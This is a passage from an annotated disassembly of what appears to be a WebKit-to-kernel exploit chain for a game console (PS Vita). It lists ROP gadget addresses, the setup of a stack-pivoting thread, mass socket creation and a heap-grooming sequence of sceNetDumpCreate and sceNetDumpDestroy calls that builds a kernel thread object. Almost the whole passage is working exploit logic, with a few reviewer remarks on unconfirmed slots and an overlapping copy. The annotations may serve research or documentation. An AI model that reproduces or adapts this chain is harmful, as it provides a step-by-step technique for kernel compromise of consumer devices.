  400. 0x00003080-0x000030A4: sceLibC_sub0x00013F01(exploit + 0x00007448, exploit + 0x00008A8C, 0x300);//copy Kernel Thread ROP (0x8A8C.., 0x300 bytes) to 0x7448..0x7747, right after the kernel pointer stored at 0x7444 — "mapped memory?" is the original author's guess
  401. 0x000030A8-0x000030CC: sceLibC_sub0x00013F01(exploit + 0x00007744,exploit + 0x00008EB8, 0x400); //copy Kernel Thread Encrypted Data? NOTE(review): 0x7744 is 4 bytes before the end of the previous copy (0x7448 + 0x300 = 0x7748), so this overwrites the last word of the ROP copy — confirm the overlap is intended
  402.  
  403. //Kernel Thread PC,SP: (original author's label; the sceKernelStartThread call for the "mhm" thread that consumes these slots is not in this excerpt, so which slot becomes SP and which PC is not confirmed here)
  404. 0x000030D0-0x00003104: [exploit + 0x00008858] = [exploit + 0x00008458] + 0x000006DC
  405. 0x00003108-0x00003154: [exploit + 0x0000884C] = [exploit + 0x00008458] + 0x000006F8 + 0x00000004
  406. 0x00003158-0x0000318C: [exploit + 0x00008850] = [exploit + 0x00008464] + 0x00000347
  407.  
  408. 0x00003190-0x000031D4: [exploit + 0x00008620/*mhm_threadID*/] = sceKernelCreateThread(exploit + 0x0001037C /*"mhm"*/, threadEntry{sceWebKit + 0x000054C8 /* LDMIA R1,{R1,R2,R4,R8,R11,SP,PC} */}, 0x10000100, 0x00002000, 0, 0, 0);
  411. 0x000031D8-0x000031F4: [exploit + 0x0000862C/*mhm_threadInfo.size*/] = 0x0000007C
  412. 0x000031F8-0x00003214: sceKernelGetThreadInfo([exploit + 0x00008620/*mhm_threadID*/], exploit + 0x0000862C /*mhm_threadInfo*/);
  413. 0x00003218-0x0000324C: [exploit + 0x000086FC] = [exploit + 0x00008660/*mhm_threadInfo.stack*/] + 0x00001000
  414.  
  415. /*
  416. PART 3 - Create Kernel Mode Thread Object
  417. */
  418. 0x00003250-0x0000328C: [exploit + 0x00008470] = sceNetSocket(exploit + 0x00010388, 0x00000002, 0x00000001, 0x00000000) // repeated below with the name pointer advancing 8 bytes per call; arguments 2/1/0 look like AF_INET/SOCK_STREAM/0 on a BSD-style API but are not confirmed here
  419.  
  420. 0x00003290-0x000032CC: [exploit + 0x00008474] = sceNetSocket(exploit + 0x00010390, 0x00000002, 0x00000001, 0x00000000)
  421.  
  422. 0x000032D0-0x0000330C: [exploit + 0x00008478] = sceNetSocket(exploit + 0x00010398, 0x00000002, 0x00000001, 0x00000000)
  423.  
  424. 0x00003310-0x0000334C: [exploit + 0x0000847C] = sceNetSocket(exploit + 0x000103A0, 0x00000002, 0x00000001, 0x00000000)
  425.  
  426. 0x00003350-0x0000338C: [exploit + 0x00008480] = sceNetSocket(exploit + 0x000103A8, 0x00000002, 0x00000001, 0x00000000)
  427.  
  428. 0x00003390-0x000033CC: [exploit + 0x00008484] = sceNetSocket(exploit + 0x000103B0, 0x00000002, 0x00000001, 0x00000000)
  429.  
  430. 0x000033D0-0x0000340C: [exploit + 0x00008488] = sceNetSocket(exploit + 0x000103B8, 0x00000002, 0x00000001, 0x00000000)
  431.  
  432. 0x00003410-0x0000344C: [exploit + 0x0000848C] = sceNetSocket(exploit + 0x000103C0, 0x00000002, 0x00000001, 0x00000000)
  433.  
  434. 0x00003450-0x0000348C: [exploit + 0x00008490] = sceNetSocket(exploit + 0x000103C8, 0x00000002, 0x00000001, 0x00000000)
  435.  
  436. 0x00003490-0x000034CC: [exploit + 0x00008494] = sceNetSocket(exploit + 0x000103D0, 0x00000002, 0x00000001, 0x00000000)
  437.  
  438. 0x000034D0-0x0000350C: [exploit + 0x00008498] = sceNetSocket(exploit + 0x000103D8, 0x00000002, 0x00000001, 0x00000000)
  439.  
  440. 0x00003510-0x0000354C: [exploit + 0x0000849C] = sceNetSocket(exploit + 0x000103E0, 0x00000002, 0x00000001, 0x00000000)
  441.  
  442. 0x00003550-0x0000358C: [exploit + 0x000084A0] = sceNetSocket(exploit + 0x000103E8, 0x00000002, 0x00000001, 0x00000000)
  443.  
  444. 0x00003590-0x000035CC: [exploit + 0x000084A4] = sceNetSocket(exploit + 0x000103F0, 0x00000002, 0x00000001, 0x00000000)
  445.  
  446. 0x000035D0-0x0000360C: [exploit + 0x000084A8] = sceNetSocket(exploit + 0x000103F8, 0x00000002, 0x00000001, 0x00000000)
  447.  
  448. 0x00003610-0x0000364C: [exploit + 0x000084AC] = sceNetSocket(exploit + 0x00010400, 0x00000002, 0x00000001, 0x00000000)
  449.  
  450. 0x00003650-0x0000368C: [exploit + 0x000084B0] = sceNetSocket(exploit + 0x00010408, 0x00000002, 0x00000001, 0x00000000)
  451.  
  452. 0x00003690-0x000036CC: [exploit + 0x000084B4] = sceNetSocket(exploit + 0x00010410, 0x00000002, 0x00000001, 0x00000000)
  453.  
  454. 0x000036D0-0x0000370C: [exploit + 0x000084B8] = sceNetSocket(exploit + 0x00010418, 0x00000002, 0x00000001, 0x00000000)
  455.  
  456. 0x00003710-0x0000374C: [exploit + 0x000084BC] = sceNetSocket(exploit + 0x00010420, 0x00000002, 0x00000001, 0x00000000)
  457.  
  458. 0x00003750-0x0000378C: [exploit + 0x000084C0] = sceNetSocket(exploit + 0x00010428, 0x00000002, 0x00000001, 0x00000000)
  459.  
  460. 0x00003790-0x000037CC: [exploit + 0x000084C4] = sceNetSocket(exploit + 0x00010430, 0x00000002, 0x00000001, 0x00000000)
  461.  
  462. 0x000037D0-0x0000380C: [exploit + 0x000084C8] = sceNetSocket(exploit + 0x00010438, 0x00000002, 0x00000001, 0x00000000)
  463.  
  464. 0x00003810-0x0000384C: [exploit + 0x000084CC] = sceNetSocket(exploit + 0x00010440, 0x00000002, 0x00000001, 0x00000000)
  465.  
  466. 0x00003850-0x0000388C: [exploit + 0x000084D0] = sceNetSocket(exploit + 0x00010448, 0x00000002, 0x00000001, 0x00000000)
  467.  
  468. 0x00003890-0x000038CC: [exploit + 0x000084D4] = sceNetSocket(exploit + 0x00010450, 0x00000002, 0x00000001, 0x00000000)
  469.  
  470. 0x000038D0-0x0000390C: [exploit + 0x000084D8] = sceNetSocket(exploit + 0x00010458, 0x00000002, 0x00000001, 0x00000000)
  471.  
  472. 0x00003910-0x0000394C: [exploit + 0x000084DC] = sceNetSocket(exploit + 0x00010460, 0x00000002, 0x00000001, 0x00000000)
  473.  
  474. 0x00003950-0x0000398C: [exploit + 0x000084E0] = sceNetSocket(exploit + 0x00010468, 0x00000002, 0x00000001, 0x00000000)
  475.  
  476. 0x00003990-0x000039CC: [exploit + 0x000084E4] = sceNetSocket(exploit + 0x00010470, 0x00000002, 0x00000001, 0x00000000)
  477.  
  478. 0x000039D0-0x00003A0C: [exploit + 0x000084E8] = sceNetSocket(exploit + 0x00010478, 0x00000002, 0x00000001, 0x00000000)
  479.  
  480. 0x00003A10-0x00003A4C: [exploit + 0x000084EC] = sceNetSocket(exploit + 0x00010480, 0x00000002, 0x00000001, 0x00000000)
  481.  
  482. 0x00003A50-0x00003A8C: [exploit + 0x000084F0] = sceNetSocket(exploit + 0x00010488, 0x00000002, 0x00000001, 0x00000000)
  483.  
  484. 0x00003A90-0x00003ACC: [exploit + 0x000084F4] = sceNetSocket(exploit + 0x00010490, 0x00000002, 0x00000001, 0x00000000)
  485.  
  486. 0x00003AD0-0x00003B0C: [exploit + 0x000084F8] = sceNetSocket(exploit + 0x00010498, 0x00000002, 0x00000001, 0x00000000)
  487.  
  488. 0x00003B10-0x00003B4C: [exploit + 0x000084FC] = sceNetSocket(exploit + 0x000104A0, 0x00000002, 0x00000001, 0x00000000)
  489.  
  490. 0x00003B50-0x00003B8C: [exploit + 0x00008500] = sceNetSocket(exploit + 0x000104A8, 0x00000002, 0x00000001, 0x00000000)
  491.  
  492. 0x00003B90-0x00003BCC: [exploit + 0x00008504] = sceNetSocket(exploit + 0x000104B0, 0x00000002, 0x00000001, 0x00000000)
  493.  
  494. 0x00003BD0-0x00003C0C: [exploit + 0x00008508] = sceNetSocket(exploit + 0x000104B8, 0x00000002, 0x00000001, 0x00000000)
  495.  
  496. 0x00003C10-0x00003C4C: [exploit + 0x0000850C] = sceNetSocket(exploit + 0x000104C0, 0x00000002, 0x00000001, 0x00000000)
  497.  
  498. 0x00003C50-0x00003C8C: [exploit + 0x00008510] = sceNetSocket(exploit + 0x000104C8, 0x00000002, 0x00000001, 0x00000000)
  499.  
  500. 0x00003C90-0x00003CCC: [exploit + 0x00008514] = sceNetSocket(exploit + 0x000104D0, 0x00000002, 0x00000001, 0x00000000)
  501.  
  502. 0x00003CD0-0x00003D0C: [exploit + 0x00008518] = sceNetSocket(exploit + 0x000104D8, 0x00000002, 0x00000001, 0x00000000)
  503.  
  504. 0x00003D10-0x00003D4C: [exploit + 0x0000851C] = sceNetSocket(exploit + 0x000104E0, 0x00000002, 0x00000001, 0x00000000)
  505.  
  506. 0x00003D50-0x00003D8C: [exploit + 0x00008520] = sceNetSocket(exploit + 0x000104E8, 0x00000002, 0x00000001, 0x00000000)
  507.  
  508. 0x00003D90-0x00003DCC: [exploit + 0x00008524] = sceNetSocket(exploit + 0x000104F0, 0x00000002, 0x00000001, 0x00000000)
  509.  
  510. 0x00003DD0-0x00003E0C: [exploit + 0x00008528] = sceNetSocket(exploit + 0x000104F8, 0x00000002, 0x00000001, 0x00000000)
  511.  
  512. 0x00003E10-0x00003E4C: [exploit + 0x0000852C] = sceNetSocket(exploit + 0x00010500, 0x00000002, 0x00000001, 0x00000000)
  513.  
  514. 0x00003E50-0x00003E8C: [exploit + 0x00008530] = sceNetSocket(exploit + 0x00010508, 0x00000002, 0x00000001, 0x00000000)
  515.  
  516. 0x00003E90-0x00003ECC: [exploit + 0x00008534] = sceNetSocket(exploit + 0x00010510, 0x00000002, 0x00000001, 0x00000000)
  517.  
  518. 0x00003ED0-0x00003F0C: [exploit + 0x00008538] = sceNetSocket(exploit + 0x00010518, 0x00000002, 0x00000001, 0x00000000)
  519.  
  520. 0x00003F10-0x00003F4C: [exploit + 0x0000853C] = sceNetSocket(exploit + 0x00010520, 0x00000002, 0x00000001, 0x00000000)
  521.  
  522. 0x00003F50-0x00003F8C: [exploit + 0x00008540] = sceNetSocket(exploit + 0x00010528, 0x00000002, 0x00000001, 0x00000000)
  523.  
  524. 0x00003F90-0x00003FCC: [exploit + 0x00008544] = sceNetSocket(exploit + 0x00010530, 0x00000002, 0x00000001, 0x00000000)
  525.  
  526. 0x00003FD0-0x0000400C: [exploit + 0x00008548] = sceNetSocket(exploit + 0x00010538, 0x00000002, 0x00000001, 0x00000000)
  527.  
  528. 0x00004010-0x0000404C: [exploit + 0x0000854C] = sceNetSocket(exploit + 0x00010540, 0x00000002, 0x00000001, 0x00000000)
  529.  
  530. 0x00004050-0x0000408C: [exploit + 0x00008550] = sceNetSocket(exploit + 0x00010548, 0x00000002, 0x00000001, 0x00000000)
  531.  
  532. 0x00004090-0x000040CC: [exploit + 0x00008554] = sceNetSocket(exploit + 0x00010550, 0x00000002, 0x00000001, 0x00000000)
  533.  
  534. 0x000040D0-0x0000410C: [exploit + 0x00008558] = sceNetSocket(exploit + 0x00010558, 0x00000002, 0x00000001, 0x00000000)
  535.  
  536. 0x00004110-0x0000414C: [exploit + 0x0000855C] = sceNetSocket(exploit + 0x00010560, 0x00000002, 0x00000001, 0x00000000)
  537.  
  538. 0x00004150-0x0000418C: [exploit + 0x00008560] = sceNetSocket(exploit + 0x00010568, 0x00000002, 0x00000001, 0x00000000)
  539.  
  540. 0x00004190-0x000041CC: [exploit + 0x00008564] = sceNetSocket(exploit + 0x00010570, 0x00000002, 0x00000001, 0x00000000)
  541.  
  542. 0x000041D0-0x0000420C: [exploit + 0x00008568] = sceNetSocket(exploit + 0x00010578, 0x00000002, 0x00000001, 0x00000000)
  543.  
  544. 0x00004210-0x0000424C: [exploit + 0x0000856C] = sceNetSocket(exploit + 0x00010580, 0x00000002, 0x00000001, 0x00000000)
  545.  
  546. 0x00004250-0x0000428C: [exploit + 0x00008570] = sceNetSocket(exploit + 0x00010588, 0x00000002, 0x00000001, 0x00000000)
  547.  
  548. 0x00004290-0x000042CC: [exploit + 0x00008574] = sceNetSocket(exploit + 0x00010590, 0x00000002, 0x00000001, 0x00000000)
  549.  
  550. 0x000042D0-0x0000430C: [exploit + 0x00008578] = sceNetSocket(exploit + 0x00010598, 0x00000002, 0x00000001, 0x00000000)
  551.  
  552. 0x00004310-0x0000434C: [exploit + 0x0000857C] = sceNetSocket(exploit + 0x000105A0, 0x00000002, 0x00000001, 0x00000000)
  553.  
  554. 0x00004350-0x0000438C: [exploit + 0x00008580] = sceNetSocket(exploit + 0x000105A8, 0x00000002, 0x00000001, 0x00000000)
  555.  
  556. 0x00004390-0x000043CC: [exploit + 0x00008584] = sceNetSocket(exploit + 0x000105B0, 0x00000002, 0x00000001, 0x00000000)
  557.  
  558. 0x000043D0-0x0000440C: [exploit + 0x00008588] = sceNetSocket(exploit + 0x000105B8, 0x00000002, 0x00000001, 0x00000000)
  559.  
  560. 0x00004410-0x0000444C: [exploit + 0x0000858C] = sceNetSocket(exploit + 0x000105C0, 0x00000002, 0x00000001, 0x00000000)
  561.  
  562. 0x00004450-0x0000448C: [exploit + 0x00008590] = sceNetSocket(exploit + 0x000105C8, 0x00000002, 0x00000001, 0x00000000)
  563.  
  564. 0x00004490-0x000044CC: [exploit + 0x00008594] = sceNetSocket(exploit + 0x000105D0, 0x00000002, 0x00000001, 0x00000000)
  565.  
  566. 0x000044D0-0x0000450C: [exploit + 0x00008598] = sceNetSocket(exploit + 0x000105D8, 0x00000002, 0x00000001, 0x00000000)
  567.  
  568. 0x00004510-0x0000454C: [exploit + 0x0000859C] = sceNetSocket(exploit + 0x000105E0, 0x00000002, 0x00000001, 0x00000000)
  569.  
  570. 0x00004550-0x0000458C: [exploit + 0x000085A0] = sceNetSocket(exploit + 0x000105E8, 0x00000002, 0x00000001, 0x00000000)
  571.  
  572. 0x00004590-0x000045CC: [exploit + 0x000085A4] = sceNetSocket(exploit + 0x000105F0, 0x00000002, 0x00000001, 0x00000000)
  573.  
  574. 0x000045D0-0x0000460C: [exploit + 0x000085A8] = sceNetSocket(exploit + 0x000105F8, 0x00000002, 0x00000001, 0x00000000)
  575.  
  576. 0x00004610-0x0000464C: [exploit + 0x000085AC] = sceNetSocket(exploit + 0x00010600, 0x00000002, 0x00000001, 0x00000000)
  577.  
  578. 0x00004650-0x0000468C: [exploit + 0x000085B8] = sceNetSocket(exploit + 0x00010608, 0x00000002, 0x00000001, 0x00000000)
  579.  
  580. 0x00004690-0x000046CC: [exploit + 0x000085C4] = sceNetSocket(exploit + 0x00010614, 0x00000002, 0x00000007, 0x00000000)
  581.  
  582. // Create mhm thread ROP:
  583. 0x000046D0-0x000046EC: [exploit + 0x00008708] = sceWebKit + 0x008DD9B5 POP {R0-R5,PC}
  584. 0x000046F0-0x0000470C: [exploit + 0x0000870C] = [exploit + 0x000085C4]
  585. 0x00004710-0x0000472C: [exploit + 0x00008710] = 0x10007300
  586. 0x00004730-0x0000474C: [exploit + 0x00008714] = 0x00000000
  587. 0x00004750-0x0000476C: [exploit + 0x00008718] = 0x00000000
  588. 0x00004770-0x0000478C: [exploit + 0x0000871C] = sceLibNet + 0x00009F90 sceNetSyscallIoctl
  589. 0x00004790-0x000047AC: [exploit + 0x00008720] = 0x00000000
  590. 0x000047B0-0x000047CC: [exploit + 0x00008724] = sceWebKit + 0x000FCDBB BLX R4 / POP {R4,PC}
  591. 0x000047D0-0x000047EC: [exploit + 0x00008728] = exploit + 0x00008810
  592. 0x000047F0-0x0000480C: [exploit + 0x0000872C] = sceWebKit + 0x000059A9 STR R0, [R4] / POP {R4,PC}
  593. 0x00004810-0x0000482C: [exploit + 0x00008730] = 0x00000000
  594. 0x00004830-0x0000484C: [exploit + 0x00008734] = sceWebKit + 0x00000519 INFINITE LOOP
  595.  
  596. 0x00004850-0x00004874: sceLibC_sub0x00013F01([exploit + 0x000086FC],exploit + 0x00008708,0x100);//memcpy(mhm thread stack, mhm thread rop,0x100);
  597.  
  598. //mhm thread args
  599. 0x00004878-0x00004894: [exploit + 0x00008830] = [exploit + 0x000086FC] < new SP
  600. 0x00004898-0x000048B4: [exploit + 0x00008834] = sceWebKit + 0x000C048B POP {PC} < new PC
  601.  
  602. // Create Kernel Thread Object:
  603. 0x000048B8-0x000048F4: [exploit + 0x000085D0] = sceNetSocket(exploit + 0x00010620, 0x00000002, 0x00000001, 0x00000000)
  604. 0x000048F8-0x00004934: [exploit + 0x000085F4] = sceNetDumpCreate(exploit + 0x0001062C,0x00000F00,0x00000000)
  605.  
  606. 0x00004938-0x00004974: [exploit + 0x000085F8] = sceNetDumpCreate(exploit + 0x00010638,0x00000F00,0x00000000)
  607.  
  608. 0x00004978-0x000049B4: [exploit + 0x000085FC] = sceNetDumpCreate(exploit + 0x00010644,0x00000F00,0x00000000)
  609.  
  610. 0x000049B8-0x000049F4: [exploit + 0x00008600] = sceNetDumpCreate(exploit + 0x00010650,0x00000F00,0x00000000)
  611.  
  612. 0x000049F8-0x00004A34: [exploit + 0x00008604] = sceNetDumpCreate(exploit + 0x0001065C,0x00000F00,0x00000000)
  613.  
  614. 0x00004A38-0x00004A74: [exploit + 0x00008608] = sceNetDumpCreate(exploit + 0x00010668,0x00000F00,0x00000000)
  615.  
  616. 0x00004A78-0x00004AB4: [exploit + 0x0000860C] = sceNetDumpCreate(exploit + 0x00010674,0x00000F00,0x00000000)
  617.  
  618. 0x00004AB8-0x00004AF4: [exploit + 0x00008610] = sceNetDumpCreate(exploit + 0x00010680,0x00000F00,0x00000000)
  619.  
  620. 0x00004AF8-0x00004B34: [exploit + 0x00008614] = sceNetDumpCreate(exploit + 0x0001068C,0x00000F00,0x00000000)
  621.  
  622. 0x00004B38-0x00004B74: [exploit + 0x000085E8] = sceNetDumpCreate(exploit + 0x00010698,0x00000F00,0x00000000)
  623.  
  624. 0x00004B78-0x00004BB4: [exploit + 0x000085DC] = sceNetDumpCreate(exploit + 0x000106A4,0x00001000,0x00000000)
  625. 0x00004BB8-0x00004BD4: sceNetDumpDestroy([exploit + 0x000085F4])
  626.  
  627. 0x00004BD8-0x00004BF4: sceNetDumpDestroy([exploit + 0x000085FC])
  628.  
  629. 0x00004BF8-0x00004C14: sceNetDumpDestroy([exploit + 0x00008604])
  630.  
  631. 0x00004C18-0x00004C34: sceNetDumpDestroy([exploit + 0x0000860C])
  632.  
  633. 0x00004C38-0x00004C54: sceNetDumpDestroy([exploit + 0x00008614])
  634.  
  635. 0x00004C58-0x00004C74: sceNetDumpDestroy([exploit + 0x000085E8])
  636. 0x00004C78-0x00004C9C: sceNetDumpCreate(exploit + 0x000106B0,0x000D0000,0x00000000)/* r0 - lost */
  637.  
  638. 0x00004CA0-0x00004CC4: sceNetDumpCreate(exploit + 0x000106BC,0x000CFF00,0x00000000)/* r0 - lost */
  639.  
  640. 0x00004CC8-0x00004CEC: sceNetDumpCreate(exploit + 0x000106C8,0x000CFE00,0x00000000)/* r0 - lost */
  641.  
  642. 0x00004CF0-0x00004D14: sceNetDumpCreate(exploit + 0x000106D4,0x000CFD00,0x00000000)/* r0 - lost */
  643.  
  644. 0x00004D18-0x00004D3C: sceNetDumpCreate(exploit + 0x000106E0,0x000CFC00,0x00000000)/* r0 - lost */
  645.  
  646. 0x00004D40-0x00004D64: sceNetDumpCreate(exploit + 0x000106EC,0x000CFB00,0x00000000)/* r0 - lost */
  647.  
  648. 0x00004D68-0x00004D8C: sceNetDumpCreate(exploit + 0x000106F8,0x000CFA00,0x00000000)/* r0 - lost */
  649.  
  650. 0x00004D90-0x00004DB4: sceNetDumpCreate(exploit + 0x00010704,0x000CF900,0x00000000)/* r0 - lost */
  651.  
  652. 0x00004DB8-0x00004DDC: sceNetDumpCreate(exploit + 0x00010710,0x000CF800,0x00000000)/* r0 - lost */
  653.  
  654. 0x00004DE0-0x00004E04: sceNetDumpCreate(exploit + 0x0001071C,0x000CF700,0x00000000)/* r0 - lost */
  655.  
  656. 0x00004E08-0x00004E2C: sceNetDumpCreate(exploit + 0x00010728,0x000CF600,0x00000000)/* r0 - lost */
  657.  
  658. 0x00004E30-0x00004E54: sceNetDumpCreate(exploit + 0x00010734,0x000CF500,0x00000000)/* r0 - lost */
  659.  
  660. 0x00004E58-0x00004E7C: sceNetDumpCreate(exploit + 0x00010740,0x000CF400,0x00000000)/* r0 - lost */
  661.  
  662. 0x00004E80-0x00004EA4: sceNetDumpCreate(exploit + 0x0001074C,0x000CF300,0x00000000)/* r0 - lost */
  663.  
  664. 0x00004EA8-0x00004ECC: sceNetDumpCreate(exploit + 0x00010758,0x000CF200,0x00000000)/* r0 - lost */
  665.  
  666. 0x00004ED0-0x00004EF4: sceNetDumpCreate(exploit + 0x00010764,0x000CF100,0x00000000)/* r0 - lost */
  667.  
  668. 0x00004EF8-0x00004F1C: sceNetDumpCreate(exploit + 0x00010770,0x000CF000,0x00000000)/* r0 - lost */
  669.  
  670. 0x00004F20-0x00004F44: sceNetDumpCreate(exploit + 0x0001077C,0x000CEF00,0x00000000)/* r0 - lost */
  671.  
  672. 0x00004F48-0x00004F6C: sceNetDumpCreate(exploit + 0x00010788,0x000CEE00,0x00000000)/* r0 - lost */
  673.  
  674. 0x00004F70-0x00004F94: sceNetDumpCreate(exploit + 0x00010794,0x000CED00,0x00000000)/* r0 - lost */
  675.  
  676. 0x00004F98-0x00004FBC: sceNetDumpCreate(exploit + 0x000107A0,0x000CEC00,0x00000000)/* r0 - lost */
  677.  
  678. 0x00004FC0-0x00004FE4: sceNetDumpCreate(exploit + 0x000107AC,0x000CEB00,0x00000000)/* r0 - lost */
  679.  
  680. 0x00004FE8-0x0000500C: sceNetDumpCreate(exploit + 0x000107B8,0x000CEA00,0x00000000)/* r0 - lost */
  681.  
  682. 0x00005010-0x00005034: sceNetDumpCreate(exploit + 0x000107C4,0x000CE900,0x00000000)/* r0 - lost */
  683.  
  684. 0x00005038-0x0000505C: sceNetDumpCreate(exploit + 0x000107D0,0x000CE800,0x00000000)/* r0 - lost */
  685.  
  686. 0x00005060-0x00005084: sceNetDumpCreate(exploit + 0x000107DC,0x000CE700,0x00000000)/* r0 - lost */
  687.  
  688. 0x00005088-0x000050AC: sceNetDumpCreate(exploit + 0x000107E8,0x000CE600,0x00000000)/* r0 - lost */
  689.  
  690. 0x000050B0-0x000050D4: sceNetDumpCreate(exploit + 0x000107F4,0x000CE500,0x00000000)/* r0 - lost */
  691.  
  692. 0x000050D8-0x000050FC: sceNetDumpCreate(exploit + 0x00010800,0x000CE400,0x00000000)/* r0 - lost */
  693.  
  694. 0x00005100-0x00005124: sceNetDumpCreate(exploit + 0x0001080C,0x000CE300,0x00000000)/* r0 - lost */
  695.  
  696. 0x00005128-0x0000514C: sceNetDumpCreate(exploit + 0x00010818,0x000CE200,0x00000000)/* r0 - lost */
  697.  
  698. 0x00005150-0x00005174: sceNetDumpCreate(exploit + 0x00010824,0x000CE100,0x00000000)/* r0 - lost */
  699.  
  700. 0x00005178-0x0000519C: sceNetDumpCreate(exploit + 0x00010830,0x000CE000,0x00000000)/* r0 - lost */
  701.  
  702. 0x000051A0-0x000051C4: sceNetDumpCreate(exploit + 0x0001083C,0x000CDF00,0x00000000)/* r0 - lost */
  703.  
  704. 0x000051C8-0x000051EC: sceNetDumpCreate(exploit + 0x00010848,0x000CDE00,0x00000000)/* r0 - lost */
  705.  
  706. 0x000051F0-0x00005214: sceNetDumpCreate(exploit + 0x00010854,0x000CDD00,0x00000000)/* r0 - lost */
  707.  
  708. 0x00005218-0x0000523C: sceNetDumpCreate(exploit + 0x00010860,0x000CDC00,0x00000000)/* r0 - lost */
  709.  
  710. 0x00005240-0x00005264: sceNetDumpCreate(exploit + 0x0001086C,0x000CDB00,0x00000000)/* r0 - lost */
  711.  
  712. 0x00005268-0x0000528C: sceNetDumpCreate(exploit + 0x00010878,0x000CDA00,0x00000000)/* r0 - lost */
  713.  
  714. 0x00005290-0x000052B4: sceNetDumpCreate(exploit + 0x00010884,0x000CD900,0x00000000)/* r0 - lost */
  715.  
  716. 0x000052B8-0x000052DC: sceNetDumpCreate(exploit + 0x00010890,0x000CD800,0x00000000)/* r0 - lost */
  717.  
  718. 0x000052E0-0x00005304: sceNetDumpCreate(exploit + 0x0001089C,0x000CD700,0x00000000)/* r0 - lost */
  719.  
  720. 0x00005308-0x0000532C: sceNetDumpCreate(exploit + 0x000108A8,0x000CD600,0x00000000)/* r0 - lost */
  721.  
  722. 0x00005330-0x00005354: sceNetDumpCreate(exploit + 0x000108B4,0x000CD500,0x00000000)/* r0 - lost */
  723.  
  724. 0x00005358-0x0000537C: sceNetDumpCreate(exploit + 0x000108C0,0x000CD400,0x00000000)/* r0 - lost */
  725.  
  726. 0x00005380-0x000053A4: sceNetDumpCreate(exploit + 0x000108CC,0x000CD300,0x00000000)/* r0 - lost */
  727.  
  728. 0x000053A8-0x000053CC: sceNetDumpCreate(exploit + 0x000108D8,0x000CD200,0x00000000)/* r0 - lost */
  729.  
  730. 0x000053D0-0x000053F4: sceNetDumpCreate(exploit + 0x000108E4,0x000CD100,0x00000000)/* r0 - lost */
  731.  
  732. 0x000053F8-0x0000541C: sceNetDumpCreate(exploit + 0x000108F0,0x000CD000,0x00000000)/* r0 - lost */
  733.  
  734. 0x00005420-0x00005444: sceNetDumpCreate(exploit + 0x000108FC,0x000CCF00,0x00000000)/* r0 - lost */
  735.  
  736. 0x00005448-0x0000546C: sceNetDumpCreate(exploit + 0x00010908,0x000CCE00,0x00000000)/* r0 - lost */
  737.  
  738. 0x00005470-0x00005494: sceNetDumpCreate(exploit + 0x00010914,0x000CCD00,0x00000000)/* r0 - lost */
  739.  
  740. 0x00005498-0x000054BC: sceNetDumpCreate(exploit + 0x00010920,0x000CCC00,0x00000000)/* r0 - lost */
  741.  
  742. 0x000054C0-0x000054E4: sceNetDumpCreate(exploit + 0x0001092C,0x000CCB00,0x00000000)/* r0 - lost */
  743.  
  744. 0x000054E8-0x0000550C: sceNetDumpCreate(exploit + 0x00010938,0x000CCA00,0x00000000)/* r0 - lost */
  745.  
  746. 0x00005510-0x00005534: sceNetDumpCreate(exploit + 0x00010944,0x000CC900,0x00000000)/* r0 - lost */
  747.  
  748. 0x00005538-0x0000555C: sceNetDumpCreate(exploit + 0x00010950,0x000CC800,0x00000000)/* r0 - lost */
  749.  
  750. 0x00005560-0x00005584: sceNetDumpCreate(exploit + 0x0001095C,0x000CC700,0x00000000)/* r0 - lost */
  751.  
  752. 0x00005588-0x000055AC: sceNetDumpCreate(exploit + 0x00010968,0x000CC600,0x00000000)/* r0 - lost */
  753.  
  754. 0x000055B0-0x000055D4: sceNetDumpCreate(exploit + 0x00010974,0x000CC500,0x00000000)/* r0 - lost */
  755.  
  756. 0x000055D8-0x000055FC: sceNetDumpCreate(exploit + 0x00010980,0x000CC400,0x00000000)/* r0 - lost */
  757.  
  758. 0x00005600-0x00005624: sceNetDumpCreate(exploit + 0x0001098C,0x000CC300,0x00000000)/* r0 - lost */
  759.  
  760. 0x00005628-0x0000564C: sceNetDumpCreate(exploit + 0x00010998,0x000CC200,0x00000000)/* r0 - lost */
  761.  
  762. 0x00005650-0x00005674: sceNetDumpCreate(exploit + 0x000109A4,0x000CC100,0x00000000)/* r0 - lost */
  763.  
  764. 0x00005678-0x0000569C: sceNetDumpCreate(exploit + 0x000109B0,0x000CC000,0x00000000)/* r0 - lost */
  765.  
  766. 0x000056A0-0x000056C4: sceNetDumpCreate(exploit + 0x000109BC,0x000CBF00,0x00000000)/* r0 - lost */
  767.  
  768. 0x000056C8-0x000056EC: sceNetDumpCreate(exploit + 0x000109C8,0x000CBE00,0x00000000)/* r0 - lost */
  769.  
  770. 0x000056F0-0x00005714: sceNetDumpCreate(exploit + 0x000109D4,0x000CBD00,0x00000000)/* r0 - lost */
  771.  
  772. 0x00005718-0x0000573C: sceNetDumpCreate(exploit + 0x000109E0,0x000CBC00,0x00000000)/* r0 - lost */
  773.  
  774. 0x00005740-0x00005764: sceNetDumpCreate(exploit + 0x000109EC,0x000CBB00,0x00000000)/* r0 - lost */
  775.  
  776. 0x00005768-0x0000578C: sceNetDumpCreate(exploit + 0x000109F8,0x000CBA00,0x00000000)/* r0 - lost */
  777.  
  778. 0x00005790-0x000057B4: sceNetDumpCreate(exploit + 0x00010A04,0x000CB900,0x00000000)/* r0 - lost */
  779.  
  780. 0x000057B8-0x000057DC: sceNetDumpCreate(exploit + 0x00010A10,0x000CB800,0x00000000)/* r0 - lost */
  781.  
  782. 0x000057E0-0x00005804: sceNetDumpCreate(exploit + 0x00010A1C,0x000CB700,0x00000000)/* r0 - lost */
  783.  
  784. 0x00005808-0x0000582C: sceNetDumpCreate(exploit + 0x00010A28,0x000CB600,0x00000000)/* r0 - lost */
  785.  
  786. 0x00005830-0x00005854: sceNetDumpCreate(exploit + 0x00010A34,0x000CB500,0x00000000)/* r0 - lost */
  787.  
  788. 0x00005858-0x0000587C: sceNetDumpCreate(exploit + 0x00010A40,0x000CB400,0x00000000)/* r0 - lost */
  789.  
  790. 0x00005880-0x000058A4: sceNetDumpCreate(exploit + 0x00010A4C,0x000CB300,0x00000000)/* r0 - lost */
  791.  
  792. 0x000058A8-0x000058CC: sceNetDumpCreate(exploit + 0x00010A58,0x000CB200,0x00000000)/* r0 - lost */
  793.  
  794. 0x000058D0-0x000058F4: sceNetDumpCreate(exploit + 0x00010A64,0x000CB100,0x00000000)/* r0 - lost */
  795.  
  796. 0x000058F8-0x0000591C: sceNetDumpCreate(exploit + 0x00010A70,0x000CB000,0x00000000)/* r0 - lost */
  797.  
  798. 0x00005920-0x00005944: sceNetDumpCreate(exploit + 0x00010A7C,0x000CAF00,0x00000000)/* r0 - lost */
  799.  
